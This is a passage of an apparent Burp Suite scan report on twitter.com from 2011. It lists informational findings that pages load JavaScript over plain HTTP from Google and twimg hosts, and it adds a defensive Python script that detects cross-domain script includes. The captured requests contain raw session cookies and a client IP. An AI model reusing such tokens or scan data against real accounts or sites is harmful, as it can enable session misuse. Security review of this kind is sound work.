...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.386. http://twitter.com/about

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /about

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:12:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234770-9663-3714
ETag: "759e29e67d3c94cea37b1e09aabdf212"
Last-Modified: Fri, 28 Jan 2011 17:12:50 GMT
X-Runtime: 0.01683
Content-Type: text/html; charset=utf-8
Content-Length: 15031
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--e41b589258f43ce00a3c10f5af818420400a35c0; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.387. http://twitter.com/about

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /about

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225078-81361-59906
ETag: "ab332c29e3804246af65d489155e144e"
Last-Modified: Fri, 28 Jan 2011 14:31:18 GMT
X-Runtime: 0.18722
Content-Type: text/html; charset=utf-8
Content-Length: 15164
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlZThlMDExYjJmNmQzODczNjgwYWY4M2RiNzlhYTY5%250ANGU6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--5f458640ebcf7c125bea2d557117ee384f19570f; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.388. http://twitter.com/about/contact

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /about/contact

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/contact HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225078-5855-53327
ETag: "ee4327c585f1140407cbc5106769d4eb"
Last-Modified: Fri, 28 Jan 2011 14:31:18 GMT
X-Runtime: 0.02946
Content-Type: text/html; charset=utf-8
Content-Length: 10974
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlYzdiYmUxOThjZjIyNjY2YTgzMWVkNmZlNmEwM2Yw%250AMDI6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--da3a7d4f9fbdbbc32b992a2ee93c9facd042300f; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.389. http://twitter.com/about/contact

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /about/contact

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/contact HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:12:51 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234771-74564-62948
ETag: "4c188c0444cbce9437df805d7c56867a"
Last-Modified: Fri, 28 Jan 2011 17:12:51 GMT
X-Runtime: 0.02350
Content-Type: text/html; charset=utf-8
Content-Length: 10844
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.390. http://twitter.com/about/resources

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /about/resources

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/resources HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:19 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225079-3941-56167
ETag: "b3415b3a1e4db6b10e96993fd3ced6dd"
Last-Modified: Fri, 28 Jan 2011 14:31:19 GMT
X-Runtime: 0.02948
Content-Type: text/html; charset=utf-8
Content-Length: 12672
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlYTdlYjkyMDk3OTcwMTQxNTFlMjM2ZmE3YmE4ODJj%250ANmM6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--5ad46e0e7e340cae0b9f7ca2011b39284030c689; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.391. http://twitter.com/about/resources

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /about/resources

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/resources HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:12:52 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234772-27950-53622
ETag: "3fe1eb47d48f7490841d19f6488f5a08"
Last-Modified: Fri, 28 Jan 2011 17:12:52 GMT
X-Runtime: 0.03441
Content-Type: text/html; charset=utf-8
Content-Length: 12542
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296182903" type="text/javascript"></script>
...[SNIP]...
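
The twitter.com findings in this run (18.391 onward) are all the same issue class: the page loads JavaScript from ajax.googleapis.com, a0-a3.twimg.com and www.google.com, and every include is over plain http://, so whoever controls those hosts or the network path can execute script in the twitter.com origin. The Python below is an added example, not the crawler's code or Twitter's; it reproduces the check over a constructed response that mirrors the script tags seen in these responses. The two-label registrable-domain heuristic and the `trusted` allowlist are assumptions standing in for a Public Suffix List lookup and a real inventory of first-party CDN domains.

```python
"""Flag cross-domain <script src> includes in a captured HTTP response.

Added example for this report section; not the crawler's own code.
The sample response below is constructed to mirror the script tags seen
in the twitter.com responses (jquery from ajax.googleapis.com, assets
from a0-a3.twimg.com, www.google.com/jsapi) and is not a real capture.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

SAMPLE_HOST = "twitter.com"

# Constructed sample: headers trimmed, body limited to the <script> elements.
SAMPLE_RESPONSE = b"""HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
X-Frame-Options: SAMEORIGIN

<!DOCTYPE html>
<html><head><meta http-equiv="X-UA-Compatible" content="IE=edge"></head>
<body>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="/javascripts/local.js" type="text/javascript"></script>
<script src="//a3.twimg.com/a/1296179758/javascripts/api.js"></script>
<script type="text/javascript">var inlineOnly = 1;</script>
</body></html>
"""


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> start tag, in document order."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":  # HTMLParser lower-cases tag names for us
            for name, value in attrs:
                if name == "src" and value:
                    self.srcs.append(value.strip())


def registrable_domain(host):
    """Assumption: two-label heuristic (a0.twimg.com -> twimg.com).

    A real tool consults the Public Suffix List so that e.g. foo.co.uk
    is not collapsed to co.uk.
    """
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def cross_domain_scripts(raw_response, page_host, page_scheme="http", trusted=()):
    """Return the <script src> includes that load from a domain other than page_host.

    raw_response: bytes of a full HTTP response (status line, headers, blank line, body).
    page_scheme:  scheme the page itself was fetched over; scheme-relative
                  "//host/..." includes inherit it.
    trusted:      registrable domains to suppress (an assumed first-party CDN allowlist).
    """
    parts = re.split(rb"\r?\n\r?\n", raw_response, maxsplit=1)
    body = parts[1] if len(parts) == 2 else parts[0]
    collector = ScriptSrcCollector()
    collector.feed(body.decode("utf-8", errors="replace"))

    own = registrable_domain(page_host)
    findings = []
    for src in collector.srcs:
        url = urlsplit(src)
        if not url.netloc:
            continue  # relative path: same origin, not an external include
        host = url.hostname or ""
        domain = registrable_domain(host)
        if domain == own or domain in trusted:
            continue
        findings.append({
            "src": src,
            "host": host,
            # Plain-HTTP script can be replaced on the wire; every include in this report is http://.
            "plain_http": (url.scheme or page_scheme) == "http",
        })
    return findings


if __name__ == "__main__":
    for f in cross_domain_scripts(SAMPLE_RESPONSE, SAMPLE_HOST):
        flag = "PLAIN-HTTP " if f["plain_http"] else ""
        print(f"{flag}{f['host']:<24} {f['src']}")
```

On the constructed sample this reports four includes, all plain-HTTP; passing `trusted={"twimg.com"}` suppresses the first-party CDN and leaves the two Google hosts, which is the triage a reviewer does before grading an include as genuinely third-party. Passing `page_scheme="https"` shows why scheme-relative includes matter: the `//a3.twimg.com` entry stops being flagged as plain-HTTP only when the page itself is served over TLS.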

18.392. http://twitter.com/about/resources

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /about/resources

Issue detail

The response dynamically includes scripts from the following other domains (see the <script src> elements in the response body below): ajax.googleapis.com, a0-a3.twimg.com, www.google.com.

Request

GET /about/resources HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:33:25 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225205-63225-2420
ETag: "1a4f3c18519f75b7266df4f8dc394c9f"
Last-Modified: Fri, 28 Jan 2011 14:33:25 GMT
X-Runtime: 0.02207
Content-Type: text/html; charset=utf-8
Content-Length: 12672
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlNDUxYTUxZDBlYTcxMDVkMTQ2NjM5NzM3ZjE5ZjQ5%250AZDE6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--c5066d7aa424a660c61f86a5ccedf91a37b4d85a; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


